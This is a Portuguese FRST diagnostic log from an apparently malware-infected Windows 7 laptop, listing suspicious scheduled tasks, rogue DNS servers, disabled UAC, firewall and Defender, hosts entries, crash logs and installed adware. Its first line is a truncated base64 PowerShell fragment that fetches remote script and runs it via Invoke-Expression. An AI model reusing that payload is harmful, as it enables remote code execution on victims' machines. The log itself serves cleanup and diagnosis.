G0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {D8D9B90F-2779-4362-8EF0-8C65E3912461} - System32\Tasks\TYVBGGSEXDNVMURL => C:\ProgramData\Service7609\Service7609.exe [2016-01-27] () <==== ATENÇÃO
Task: {EE5807FB-BFAE-47D4-B609-39B858E49FAE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {F0E0E8AF-50E1-47F3-813A-BBA05071D7B2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {F5EDFA31-2E38-43DA-AEE1-674D1151DA09} - System32\Tasks\Recovery Management\Burn Notification => C:\Program Files\Acer\Acer eRecovery Management\NotificationCenter\Notification.exe [2012-03-15] (Acer)
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\TYVBGGSEXDNVMURL.job => C:\ProgramData\Service7609\Service7609.exe <==== ATENÇÃO
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
==================== Módulos Carregados (Whitelisted) ==============
2016-02-04 10:10 - 2016-02-04 10:11 - 00408576 _____ () c:\windows\mtkw.exe
2016-02-04 10:10 - 2016-02-04 10:10 - 00417792 _____ () c:\windows\tkw.exe
2010-01-30 03:40 - 2010-01-30 03:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2015-02-25 19:58 - 2014-01-03 15:13 - 00111872 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll
2016-01-30 15:50 - 2016-01-26 11:54 - 02415616 _____ () c:\programdata\msiql.exe
2014-02-25 23:11 - 2014-02-25 23:11 - 00086016 _____ () C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Map\MAP.dll
2016-01-30 15:50 - 2016-01-26 11:54 - 02415616 _____ () C:\ProgramData\msiql.exe
2015-02-25 19:50 - 2013-10-01 07:09 - 00078880 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2015-10-24 11:12 - 2015-10-24 11:12 - 98422784 _____ () C:\Windows\SysWOW64\SYSJOSEJOAO-PC.exe
2016-02-18 09:31 - 2016-02-18 09:31 - 00689560 _____ () c:\windows\temp\32703\setup.exe
2016-02-18 09:31 - 2016-02-18 09:31 - 00157184 _____ () C:\ProgramData\Oelfiireaoiwi\1.0.7.1\uheohnik.exe
2016-02-11 11:33 - 2015-05-25 08:32 - 00068432 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2016-02-11 11:33 - 2015-08-06 01:51 - 00582144 _____ () C:\Program Files (x86)\Elex-tech\YAC\curlpp.dll
2016-02-11 11:34 - 2015-08-21 00:02 - 00176976 _____ () C:\Program Files (x86)\Elex-tech\YAC\tws\unrar.dll
2016-02-11 11:34 - 2015-08-21 00:02 - 00087744 _____ () C:\Program Files (x86)\Elex-tech\YAC\tws\unacev2.dll
2016-02-11 12:14 - 2016-02-04 14:57 - 02010624 _____ () C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll
2015-02-25 19:29 - 2013-12-09 21:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2016-02-11 11:33 - 2015-01-13 02:31 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-01-19 15:06 - 2016-01-19 15:06 - 00194048 _____ () C:\Program Files (x86)\Acer\Acer Portal\curllib.dll
2016-01-19 15:06 - 2016-01-19 15:06 - 00110592 _____ () C:\Program Files (x86)\Acer\Acer Portal\OpenLDAP.dll
2015-11-16 19:55 - 2015-11-16 19:55 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll
2015-11-16 19:56 - 2015-11-16 19:56 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll
2015-11-16 19:56 - 2015-11-16 19:56 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll
2015-11-16 19:56 - 2015-11-16 19:56 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll
2016-02-04 11:13 - 2016-02-04 11:13 - 00015064 _____ () C:\Windows\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll
2016-01-14 17:12 - 2016-01-14 17:12 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll
2016-01-14 17:11 - 2016-01-14 17:11 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll
2016-02-10 22:08 - 2016-02-09 09:58 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libglesv2.dll
2016-02-10 22:08 - 2016-02-09 09:58 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt
AlternateDataStreams: C:\Windows\System32:C50A5169_Cef.gbp
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\.DEFAULT\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1007\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1007\...\caixa.gov.br -> imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1010\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
==================== Hosts Conteúdo: ==========================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-14 00:34 - 2016-01-30 15:46 - 00000967 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-764792763-2688571116-1659716825-1007\Control Panel\Desktop\\Wallpaper -> C:\Users\josejoo\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-764792763-2688571116-1659716825-1010\Control Panel\Desktop\\Wallpaper -> C:\Users\joao.josejoao-PC.000\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.143.189 - 82.163.142.189
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Firewall do Windows está desabilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{2F0C5BB3-5BF9-48CD-ADC0-E1D11880A780}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{1542AB6D-DB6A-4335-855F-13A5FCA43733}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{2F31A6BA-D110-47CD-B6F5-177AB9849494}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BB76A5ED-5E0D-4B99-AC4A-1DB8675A7436}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{16A0E38E-B5F7-493E-8B26-EC813FA68B52}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{2B2AC2AA-04EC-4A21-9611-89F06B76CFBD}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{E1DD8812-C033-442E-B657-F43388539085}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{D570674A-67ED-4F40-ABAB-DF5F7ECD5B0A}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{E5CFDD74-FA6B-4C60-9A12-7911BB8C70AC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{3A15B57D-007A-4B57-8807-1A18E588C9A4}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{9AA2A601-3E4E-4CA2-8DE1-0A55A6F34BAE}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{0E110D24-CD85-49CA-BEE7-56ABFAA33432}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{ADFE08B6-F637-4FF4-9D56-1F3C142699B0}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{92E6CF31-9195-427A-B896-7FE3C59E0A9D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{05050C04-DFFD-4F18-91EB-75DD13591E80}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{3BDBE8BC-1F42-4789-BDDE-DA487F8A5383}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [TCP Query User{934E79DB-0FCD-46CC-92D7-8AF9A9558973}C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe
FirewallRules: [UDP Query User{194F9058-7ADB-4F5A-A19F-74F582BF1E83}C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe
FirewallRules: [{8EBBE737-3118-4453-B83D-88AA892641AF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{9A9568DB-5DCC-4E09-B0CE-7AF5CB49FE1D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{9A64E5F4-EAF6-4AE7-A029-4C701FF6C7C9}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{4F0B63D4-7C65-4042-A326-D9DA2BE8F8C4}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{47F7EAE8-B9F2-45AC-882E-F8B2CC9837EC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{2134188F-B0DB-44CF-878D-BD2DEB8331A7}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{45E65790-1E8A-4637-9C4E-6862BC46A4E5}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{7CE4796C-AF0E-4044-904B-6B6E10F533EF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{C27B8F18-59BA-4C1D-B213-C57B1376116A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{49B73378-69EB-4CF5-A345-2910A4577FA2}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{0F25C8F0-99AB-4EB9-9B82-9BCFFA7C882F}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
==================== Pontos de Restauração =========================
04-02-2016 17:28:19 Ponto de Verificação Agendado
05-02-2016 08:50:38 Removed Adobe Flash Player 14 ActiveX.
11-02-2016 08:20:37 Windows Update
12-02-2016 10:15:00 Windows Update
12-02-2016 15:02:19 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============
Name: Bluetooth USB Module
Description: Bluetooth USB Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Qualcomm Atheros Communications
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: SBMNTR
Description: SBMNTR
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: sbmntr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: SPDRIVER_1.42.1.10638
Description: SPDRIVER_1.42.1.10638
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: SPDRIVER_1.42.1.10638
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (02/18/2016 09:40:00 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (02/18/2016 09:39:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: svchost.exe_SENS, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc3c1
Nome do módulo de falhas: iSafeSrvMon64.dll, versão: 6.7.30.28593, carimbo de hora: 0x55b5abeb
Código de exceção: 0xc0000417
Deslocamento com falha: 0x0000000000005cc1
Identificação do processo com falha: 0x48c
Hora de início do aplicativo com falha: 0xsvchost.exe_SENS0
Caminho do aplicativo com falha: svchost.exe_SENS1
FCaminho do módulo de falhas: svchost.exe_SENS2
Identificação do Relatório: svchost.exe_SENS3
Error: (02/18/2016 09:14:46 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003ef0d
Identificação do processo com falha: 0x1120
Hora de início do aplicativo com falha: 0xHomePage.exe0
Caminho do aplicativo com falha: HomePage.exe1
FCaminho do módulo de falhas: HomePage.exe2
Identificação do Relatório: HomePage.exe3
Error: (02/18/2016 09:10:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: mediadownloadersetup.exe, versão: 0.0.0.0, carimbo de hora: 0x2a425e19
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.23338, carimbo de hora: 0x56a1c6e6
Código de exceção: 0xc0000005
Deslocamento com falha: 0x0004def6
Identificação do processo com falha: 0xe58
Hora de início do aplicativo com falha: 0xmediadownloadersetup.exe0
Caminho do aplicativo com falha: mediadownloadersetup.exe1
FCaminho do módulo de falhas: mediadownloadersetup.exe2
Identificação do Relatório: mediadownloadersetup.exe3
Error: (02/18/2016 09:06:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: MustangSer258.exe, versão: 1.0.0.6, carimbo de hora: 0x567001d1
Nome do módulo de falhas: MustangSer258.exe, versão: 1.0.0.6, carimbo de hora: 0x567001d1
Código de exceção: 0x40000015
Deslocamento com falha: 0x00012d34
Identificação do processo com falha: 0x9fc
Hora de início do aplicativo com falha: 0xMustangSer258.exe0
Caminho do aplicativo com falha: MustangSer258.exe1
FCaminho do módulo de falhas: MustangSer258.exe2
Identificação do Relatório: MustangSer258.exe3
Error: (02/18/2016 09:05:58 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (02/18/2016 08:32:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Nome do módulo de falhas: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003dd0a
Identificação do processo com falha: 0x1aec
Hora de início do aplicativo com falha: 0xLightGate.exe0
Caminho do aplicativo com falha: LightGate.exe1
FCaminho do módulo de falhas: LightGate.exe2
Identificação do Relatório: LightGate.exe3
Error: (02/18/2016 08:32:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003ef0d
Identificação do processo com falha: 0x1b08
Hora de início do aplicativo com falha: 0xHomePage.exe0
Caminho do aplicativo com falha: HomePage.exe1
FCaminho do módulo de falhas: HomePage.exe2
Identificação do Relatório: HomePage.exe3
Error: (02/18/2016 08:31:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003ef0d
Identificação do processo com falha: 0xcec
Hora de início do aplicativo com falha: 0xHomePage.exe0
Caminho do aplicativo com falha: HomePage.exe1
FCaminho do módulo de falhas: HomePage.exe2
Identificação do Relatório: HomePage.exe3
Error: (02/18/2016 08:31:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Nome do módulo de falhas: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003dd0a
Identificação do processo com falha: 0xda4
Hora de início do aplicativo com falha: 0xLightGate.exe0
Caminho do aplicativo com falha: LightGate.exe1
FCaminho do módulo de falhas: LightGate.exe2
Identificação do Relatório: LightGate.exe3
Erros de Sistema:
=============
Error: (02/18/2016 09:47:20 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Testador de instrumentação de gerenciam. do Windows, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Agendador de Classes de Multimídia, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Módulos de Criação de Chaves IKE e AuthIP do IPSec, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Pesquisador de Computadores, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:40:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Server, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Windows Update foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Testador de instrumentação de gerenciam. do Windows foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 120000 milissegundos: Reiniciar o serviço.
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Temas foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Detecção do hardware do shell foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.
CodeIntegrity:
===================================
Date: 2016-01-28 14:38:49.574
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz
Percentagem de memória em uso: 74%
RAM física total: 4023.36 MB
RAM física disponível: 1034.13 MB
Virtual Total: 8044.91 MB
Virtual disponível: 4082.44 MB
==================== Drives ================================
Drive c: (Acer) (Fixed) (Total:448.39 GB) (Free:365.47 GB) NTFS
Drive e: (JOSÉ JOÃO) (Removable) (Total:7.25 GB) (Free:4.63 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 29F6CCD9)
Partition 1: (Not Active) - (Size=17.3 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=448.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.3 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.3 GB) - (Type=0B)
==================== Fim de Addition.txt ============================
Executado por josejoo (2016-02-18 09:51:18)
Executando a partir de C:\Users\josejoo\Desktop
Windows 7 Professional Service Pack 1 (X64) (2015-09-07 23:34:33)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-764792763-2688571116-1659716825-500 - Administrator - Disabled)
Convidado (S-1-5-21-764792763-2688571116-1659716825-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-764792763-2688571116-1659716825-1008 - Limited - Enabled)
joao (S-1-5-21-764792763-2688571116-1659716825-1010 - Limited - Enabled) => C:\Users\joao.josejoao-PC.000
josejoo (S-1-5-21-764792763-2688571116-1659716825-1007 - Administrator - Enabled) => C:\Users\josejoo
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
abMedia (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.09.2003.0 - Acer Incorporated)
abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.06.2000.22 - Acer Incorporated)
Acer ePower Management (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 6.00.3010 - Acer Incorporated)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 5.00.3508 - Acer Incorporated)
Acer Games (HKLM-x32\...\WildTangent acer Master Uninstall) (Version: 1.0.2.5 - WildTangent)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.09.2002 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.04.3507 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.2003 - Acer Incorporated)
Adobe Reader XI (11.0.04) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.04 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.15.2000.1 - Acer Incorporated)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.)
Chromium (HKU\.DEFAULT\...\Chromium) (Version: 46.0.2480.0 - Chromium)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Evernote v. 4.5.2 (HKLM-x32\...\{F77EF646-19EB-11E1-9A9E-984BE15F174E}) (Version: 4.5.2.5866 - Evernote Corp.)
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive: Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Gameo (HKU\.DEFAULT\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATENÇÃO
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3503 - Acer Incorporated)
Insaniquarium Deluxe (x32 Version: 2.2.0.97 - WildTangent) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
